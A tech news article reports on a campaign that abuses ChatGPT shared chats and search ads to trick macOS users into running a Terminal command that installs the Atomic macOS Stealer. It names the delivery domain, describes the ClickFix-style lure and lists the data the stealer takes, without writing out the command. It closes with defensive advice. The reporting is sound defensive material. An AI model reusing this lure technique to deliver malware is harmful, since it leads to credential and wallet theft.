Breaking 16:28 STMicroelectronics unveils ultra low power sensors for smart wearables 15:58 Bitcoin faces possible short squeeze as $1.4 billion bets cluster near $80,000 15:41 Dubai luxury hotels shut down as Gulf tourism crisis deepens 15:21 Norway wealth fund chief warns against AI driven job cuts 14:59 Apple plans Ultra expansion with foldable iPhone and MacBook 14:39 Scientists outline 50 urgent questions to protect global peatlands 14:19 Hengli reshapes Singapore unit after US sanctions over Iran oil 13:57 China pledges stronger energy security as Iran war hits economies 13:39 Bitcoin falls as Bank of Japan stance revives carry trade fears 13:20 Ascend Airways collapses as Iran war drives aviation fuel crisis 13:10 JPMorgan says humanoid robotics industry reaches turning point 12:45 UK continues Ajax military vehicle programme after safety review 12:30 UK PM’s former chief of staff admits error over Mandelson appointment 12:15 General Motors reports 22% rise in core profit driven by strong US truck sales 12:00 US Supreme Court to examine Cisco case over alleged role in human rights abuses in China 11:45 Blocking of Meta AI startup deal raises concerns over China tech investment rules 11:30 Sweden warns of possible jet fuel shortage amid Middle East tensions 11:26 Time ranks three Chinese firms among top global AI leaders 11:20 AlphaGo creator raises $1.1 billion for London AI startup 11:20 AlphaGo creator raises $1.1 billion for London AI startup 11:15 Merz falls to last place in German political popularity rankings 11:01 King Charles to address Congress amid US UK tensions 11:01 China politburo pledges energy security amid Iran war shock 11:00 Longi sets new silicon solar cell record surpassing Trina Solar 11:00 Australia increases pressure on Meta, Google and TikTok to pay media outlets 10:45 Citi appoints Barclays’ James Potts to lead shareholder advisory unit 10:40 Bank of Japan holds rates in split vote as Iran war lifts inflation risks 10:30 Teen injured in machete attack on Paris metro in suspected gang rivalry 10:20 Energy shock from Iran war drives return to wood fuel 10:15 Eskom and South32 partner on renewable energy plan for Hillside aluminium smelter 10:00 Pakistan shelling in Afghanistan leaves seven dead and dozens injured 10:00 Github copilot shifts to usage based pricing model from June 09:45 Temasek, LIC and Canadian pension fund prepare stake sales in NSE IPO 09:40 Kyoto study finds massive stars can speed up before collapse 09:30 South Korea court sentences former first lady Kim Keon Hee to prison 09:20 Saham Bank launches MyFX mobile platform for real time currency trading 09:15 Finland launches Europe’s first lithium mine for battery production 09:00 France expresses concern after attacks in Mali 09:00 Jacob Elordi cements global stardom with major film and television roles 08:45 Canal+ to list in South Africa as expansion strategy gains momentum 08:40 Cicchetti opens in Rabat, bringing Italian dining concept to Morocco 08:30 Deadly strike on school in southern Iran raises international concern 08:20 Anthropic restricted AI model raises new cybersecurity governance concerns 08:15 VTB reports decline in first-quarter profit but maintains annual outlook 08:00 Travis Perkins sales decline as weak construction demand weighs on performance 07:50 Dreame unveils rocket powered electric car with record acceleration claim 07:45 Securitas reports weaker first-quarter results amid currency pressures 07:30 India and China defence ministers hold talks on regional security during SCO meeting 07:15 Energy prices push German consumer sentiment to a three-year low 07:00 WPP maintains forecast despite Middle East uncertainty

Chatgpt share feature abused to spread atomic macos stealer

Wednesday 10 December 2025 - 13:20
Chatgpt share feature abused to spread atomic macos stealer

Cybercriminals are weaponizing ChatGPT’s chat sharing feature in a new campaign that installs Atomic macOS Stealer, also known as AMOS, on Apple computers while posing as a guide to a fake “Atlas browser” for macOS. The operation targets a broad audience of macOS users and cybersecurity conscious professionals who rely on search engines and official looking resources to discover new tools and troubleshoot technical issues.​

How the chatgpt share feature is abused

Security analysts report that attackers are publishing polished installation guides for a non existent Atlas browser as shared conversations hosted on the official chatgpt.com domain. These shared chats are stripped of suspicious context and presented as legitimate step by step instructions, making them appear trustworthy to users who reach them via search.​

To drive traffic, the threat actors buy Google ads targeting terms such as “chatgpt atlas,” sending users to chatgpt.com/share URLs that look indistinguishable from genuine OpenAI content. Once on the page, victims are told to copy a single command into the macOS Terminal, framed as a standard installation step for the supposed browser.​

From one line command to full system compromise

The command shown in the shared chat retrieves and runs a script hosted on the domain atlas-extension.com, which acts as the delivery mechanism for AMOS. The script repeatedly prompts the user for their macOS password and, once the correct credentials are provided, uses them to install the malware with elevated privileges and to set up persistence.​

Researchers describe this social engineering method as a variation of the ClickFix technique, in which users are convinced to execute a command presented as a fix, update, or optimization rather than as a threat. In this case, curiosity around an apparently new ChatGPT linked browser is used to override normal caution, especially among users accustomed to pasting commands from technical guides.​

Amos infostealer and its new persistent backdoor

Once installed, Atomic macOS Stealer focuses on harvesting sensitive data, including passwords, cookies, and autofill information from browsers such as Chrome and Firefox, as well as credentials and assets from cryptocurrency wallets including Electrum, Coinomi, and Exodus. The malware also searches Desktop, Documents, and Downloads folders for text, PDF, and DOCX files, and can capture session data from applications like Telegram Desktop and OpenVPN Connect.​

Recent analysis shows newer AMOS variants ship with an integrated backdoor that gives attackers persistent, remote access to infected Macs even after reboots. Cybersecurity firm Moonlock notes this marks only the second globally scaled macOS backdoor operation after previous campaigns linked to North Korean groups, and warns that AMOS has already been detected in attacks across more than 120 countries, with the United States, France, Italy, the United Kingdom, and Canada among the most affected.​

Global campaigns and blocked attacks

Threat intelligence reports describe AMOS as one of the most widespread macOS stealers currently in circulation, offered under a malware as a service model to different criminal crews. These groups combine techniques such as malvertising, fake support pages, and now shared AI chats to lure victims into running single line installation commands that bypass normal user skepticism and native security prompts.​

CrowdStrike recently disclosed that its Falcon platform blocked more than 300 attempted intrusions between June and August 2025 involving SHAMOS, a variant of Atomic macOS Stealer developed by the cybercrime group Cookie Spider. Those campaigns relied heavily on fraudulent macOS help sites promoted via online advertising, illustrating how commercial off the shelf stealers like AMOS are being repeatedly repurposed and redistributed through evolving social engineering vectors.​

Mitigation advice for macos users

Security specialists stress that users should never execute Terminal commands copied from unverified chats, search results, or online guides, regardless of whether the content is hosted on a trusted domain. Experts recommend checking any unfamiliar one line command with IT teams or by using independent analysis tools, and verifying software downloads through official vendor websites rather than search ads or intermediaries.​

Defenders advise macOS users, including professionals managing sensitive data or cryptocurrency assets, to run reputable endpoint protection capable of detecting AMOS and similar stealers, to keep systems and browsers updated, and to monitor for unusual access to accounts and wallets. Organizations are also encouraged to train staff about ClickFix style tactics that disguise malicious commands as harmless fixes or productivity enhancements.​

Keywords:



Latest News
  • Fajr
  • Sunrise
  • Dhuhr
  • Asr
  • Maghrib
  • Isha

Newsletter

Subscribe now to the Walaw website newsletter to receive all the latest updates

Email address

Read more

Anthropic restricted AI model raises new cybersecurity governance concerns Technology Anthropic restricted AI model raises new cybersecurity governance concerns
Al Barid Bank denies data breach and reassures customers over account security Technology Al Barid Bank denies data breach and reassures customers over account security
Regulators monitor Anthropic’s Mythos over potential banking risks Technology Regulators monitor Anthropic’s Mythos over potential banking risks
EU probes Anthropic over cybersecurity risks tied to mythos ai model Technology EU probes Anthropic over cybersecurity risks tied to mythos ai model

This website, walaw.press, uses cookies to provide you with a good browsing experience and to continuously improve our services. By continuing to browse this site, you agree to the use of these cookies.